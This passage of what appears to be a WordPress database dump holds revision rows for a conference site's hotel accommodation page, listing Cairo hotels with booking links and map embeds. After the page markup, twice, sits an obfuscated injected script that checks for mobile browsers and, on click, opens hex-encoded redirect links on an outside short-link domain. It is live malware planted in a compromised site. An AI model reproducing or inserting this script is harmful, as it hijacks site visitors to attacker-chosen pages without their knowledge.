72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Hotel Accommodation','','inherit','closed','closed','','2685-revision-v1','','','2023-07-18 22:23:59','2023-07-18 22:23:59','',2685,'https://gsw2023.com/?p=5017',0,'revision','',0),
(5018,1,'2023-07-18 22:33:15','2023-07-18 22:33:15','<p>[vc_row][vc_column][vc_hoverbox image=\"2683\" primary_title=\"INTERCONTINENTAL CAIRO SEMIRAMIS\" primary_title_font_container=\"color:%23eeee22\" primary_title_use_theme_fonts=\"yes\" hover_title=\"INTERCONTINENTAL CAIRO SEMIRAMIS\" el_width=\"50\" hover_btn_title=\"BOOK NOW\" hover_btn_color=\"primary\" hover_btn_align=\"center\" use_custom_fonts_primary_title=\"true\" hover_add_button=\"true\" primary_title_link=\"url:https%3A%2F%2Fwww.ihg.com%2Fintercontinental%2Fhotels%2Fgb%2Fen%2Fcairo%2Fcroha%2Fhoteldetail%23scmisc%3Dnav_hoteldetail_ic|title:Hotel%20Accommodation|target:_blank\" hover_btn_link=\"url:https%3A%2F%2Fwww.ihg.com%2Fintercontinental%2Fhotels%2Fus%2Fen%2Fcairo%2Fcroha%2Fhoteldetail%3FfromRedirect%3Dtrue%26qSrt%3DsAV%26qIta%3D99801505%26icdv%3D99801505%26qSlH%3DCROHA%26qGrpCd%3DDY8%26setPMCookies%3Dtrue%26qSHBrC%3DIC%26qDest%3DCorniche%2BEl%2BNil%25252C%2BCairo%25252C%2BEG%26srb_u%3D1\"]</p>\n<ul>\n<li style=\"text-align: left;\">\n<h6><span style=\"font-family: Arial, Helvetica, sans-serif;\"><span style=\"font-size: 8pt;\"><a href=\"https://www.ihg.com/intercontinental/hotels/gb/en/cairo/croha/hoteldetail#scmisc=nav_hoteldetail_ic\">https://www.ihg.com/intercontinental/hotels</a></span></span></h6>\n</li>\n</ul>\n<h6><span style=\"font-family: Arial, Helvetica, sans-serif;\"><span style=\"font-size: 8pt;\"><a href=\"https://www.ihg.com/intercontinental/hotels/gb/en/cairo/croha/hoteldetail#scmisc=nav_hoteldetail_ic\">/gb/en/cairo/croha/hoteldetail#scmisc=nav_hoteldetail_ic</a></span></span></h6>\n<p><iframe style=\"border: 0;\" src=\"https://www.google.com/maps/embed?pb=!1m14!1m8!1m3!1d6907.530703931726!2d31.232628000000002!3d30.043589!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x0%3A0xaf4aee1a5598653d!2sInterContinental%20Cairo%20Semiramis%2C%20an%20IHG%20Hotel!5e0!3m2!1sen!2seg!4v1674631098317!5m2!1sen!2seg\" width=\"400\" height=\"300\" allowfullscreen=\"allowfullscreen\"></iframe></p>\n<h4>Special Rate Booking is Opened Now</h4>\n<h5></h5>\n<h5>Deadline for the Special Rates is August 10, 2023</h5>\n<p>[/vc_hoverbox][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][vc_column_text]</p>\n<h1 style=\"text-align: center;\"><a>Other </a><a>Hotel Accommodation</a></h1>\n<p style=\"text-align: center;\"><a> Nearby the Conference Venue</a></p>\n<p>[/vc_column_text][vc_hoverbox image=\"2688\" primary_title=\"Steigenberger Hotel El Tahrir\" primary_title_font_container=\"color:%23eeee22\" primary_title_use_theme_fonts=\"yes\" hover_title=\"Steigenberger Hotel El Tahrir\" el_width=\"50\" hover_btn_title=\"BOOK NOW\" hover_btn_color=\"primary\" hover_btn_align=\"center\" use_custom_fonts_primary_title=\"true\" hover_add_button=\"true\" primary_title_link=\"url:https%3A%2F%2Fwww.steigenberger.com%2Fen%2Fhotels%2Fall-hotels%2Fegypt%2Fcairo%2Fsteigenberger-el-tahrir-cairo|title:Hotel%20Accommodation|target:_blank\" hover_btn_link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fsteigenberger-hotel-el-tahrir%2F\"]</p>\n<ul>\n<li><a href=\"https://www.steigenberger.com/en/hotels/all-hotels/egypt/cairo/steigenberger-el-tahrir-cairo\" target=\"_blank\" rel=\"noopener\">https://www.steigenberger.com/en/hotels/all-hotels/egypt/cairo/steigenberger-el-tahrir-cairo</a></li>\n</ul>\n<p><iframe style=\"border: 0;\" src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d3453.655731227902!2d31.233070315528174!3d30.046733125418612!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x145840c6e7b40217%3A0xa56e70b7cb4fa53d!2sSteigenberger%20Hotel%20El%20Tahrir%20Cairo!5e0!3m2!1sen!2seg!4v1663340357638!5m2!1sen!2seg\" width=\"400\" height=\"300\" allowfullscreen=\"allowfullscreen\"></iframe>[/vc_hoverbox][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][vc_hoverbox image=\"4788\" primary_title=\"Grand Nile Tower Hotel\" primary_title_font_container=\"color:%23eeee22\" primary_title_use_theme_fonts=\"yes\" hover_title=\"Grand Nile Tower Hotel\" hover_title_use_theme_fonts=\"yes\" el_width=\"50\" hover_btn_title=\"BOOK NOW\" hover_btn_color=\"primary\" use_custom_fonts_primary_title=\"true\" use_custom_fonts_hover_title=\"true\" hover_add_button=\"true\" primary_title_link=\"url:https%3A%2F%2Fwww.grandniletower.com%2F|title:Hotel%20Accommodation|target:_blank\" hover_btn_link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fgrand-nile-tower-hotel%2F|title:Grand%20Nile%20Tower%20Hotel\"]</p>\n<ul>\n<li>https://www.grandniletower.com/</li>\n</ul>\n<p><iframe style=\"border: 0;\" src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d3453.7289982262637!2d31.224693715528264!3d30.044631725517785!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x145840d0447d5a79%3A0xbb55286e18afc4d8!2sNovotel%20Cairo%20El%20Borg!5e0!3m2!1sen!2seg!4v1663342678556!5m2!1sen!2seg\" width=\"400\" height=\"300\" allowfullscreen=\"allowfullscreen\"></iframe></p>\n<h5></h5>\n<p>[/vc_hoverbox][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][vc_hoverbox image=\"2690\" primary_title=\"Novotel Cairo El Borg\" primary_title_font_container=\"color:%23eeee22\" primary_title_use_theme_fonts=\"yes\" hover_title=\"Novotel Cairo El Borg\" hover_title_use_theme_fonts=\"yes\" el_width=\"50\" hover_btn_title=\"BOOK NOW\" hover_btn_color=\"primary\" use_custom_fonts_primary_title=\"true\" use_custom_fonts_hover_title=\"true\" hover_add_button=\"true\" primary_title_link=\"url:https%3A%2F%2Fnovotelborg.com-cairo.com%2F|title:Hotel%20Accommodation|target:_blank\" hover_btn_link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fnovotel-cairo-el-borg%2F\"]</p>\n<ul>\n<li><a href=\"https://novotelborg.com-cairo.com/\" target=\"_blank\" rel=\"noopener\">https://novotelborg.com-cairo.com/</a></li>\n</ul>\n<p><iframe style=\"border: 0;\" src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d3453.7289982262637!2d31.224693715528264!3d30.044631725517785!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x145840d0447d5a79%3A0xbb55286e18afc4d8!2sNovotel%20Cairo%20El%20Borg!5e0!3m2!1sen!2seg!4v1663342678556!5m2!1sen!2seg\" width=\"400\" height=\"300\" allowfullscreen=\"allowfullscreen\"></iframe></p>\n<ul>\n<li>\n<h4>Special Rate Booking is Opened Now</h4>\n<h5>Deadline for the Special Rates is August 15, 2023</h5>\n</li>\n</ul>\n<p>[/vc_hoverbox][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][vc_hoverbox image=\"2689\" primary_title=\"Kempinski Nile Hotel Garden City Cairo\" primary_title_font_container=\"color:%230000ed\" primary_title_use_theme_fonts=\"yes\" hover_title=\"Kempinski Nile Hotel Garden City Cairo\" el_width=\"50\" use_custom_fonts_primary_title=\"true\" primary_title_link=\"url:http%3A%2F%2F%3Cli%3E%3Ca%20href%3D%22https%3A%2F%2Fwww.kempinski.com%2Fen%2Fcairo%2Fnile-hotel%2F%22%20target%3D%22_blank%22%20%3Ehttps%3A%2F%2Fwww.kempinski.com%2Fen%2Fcairo%2Fnile-hotel%2F%3C%2Fa%3E%3C%2Fli%3E|title:Hotel%20Accommodation|target:_blank\"]</p>\n<ul>\n<li><a href=\"https://www.kempinski.com/en/cairo/nile-hotel/\" target=\"_blank\" rel=\"noopener\">https://www.kempinski.com/en/cairo/nile-hotel/</a></li>\n</ul>\n<p><iframe style=\"border: 0;\" src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d3453.9374842495713!2d31.228220615528013!3d30.03865132580035!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x145840cdb8f441cb%3A0x59cf96cf4cfe8978!2sKempinski%20Nile%20Hotel%20Garden%20City%20Cairo!5e0!3m2!1sen!2seg!4v1663341682148!5m2!1sen!2seg\" width=\"400\" height=\"300\" allowfullscreen=\"allowfullscreen\"></iframe>[/vc_hoverbox][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][dt_banner image_id=\"2688\" bg_color=\"rgba(255,255,255,0.4)\" border_width=\"2\" outer_padding=\"5\" inner_padding=\"5\"]</p>\n<h2 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Steigenberger Hotel El Tahrir</span></h2>\n<p><span style=\"color: #ffffff;\"><strong><a style=\"color: #ffffff;\" href=\"https://www.steigenberger.com/en/hotels/all-hotels/egypt/cairo/steigenberger-el-tahrir-cairo\" target=\"_blank\" rel=\"noopener\">https://www.steigenberger.com/en/hotels/all-hotels/egypt/cairo/steigenberger-el-tahrir-cairo</a></strong></span></p>\n<p style=\"text-align: right;\"><iframe src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d3453.655731227902!2d31.233070315528174!3d30.046733125418612!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x145840c6e7b40217%3A0xa56e70b7cb4fa53d!2sSteigenberger%20Hotel%20El%20Tahrir%20Cairo!5e0!3m2!1sen!2seg!4v1663340357638!5m2!1sen!2seg\" width=\"400\" height=\"300\" allowfullscreen=\"allowfullscreen\"></iframe></p>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong><a style=\"color: #ffffff;\" href=\"https://gsw2023.com/index.php/steigenberger-hotel-el-tahrir/\">BOOK NOW  </a></strong></span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong><a style=\"color: #ffffff;\" href=\"https://gsw2023.com/index.php/steigenberger-hotel-el-tahrir/\">Steigenberger Hotel El Tahrir – GSW2023</a></strong></span></h4>\n<p>[/dt_banner][/vc_column][vc_column width=\"1/2\"][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return 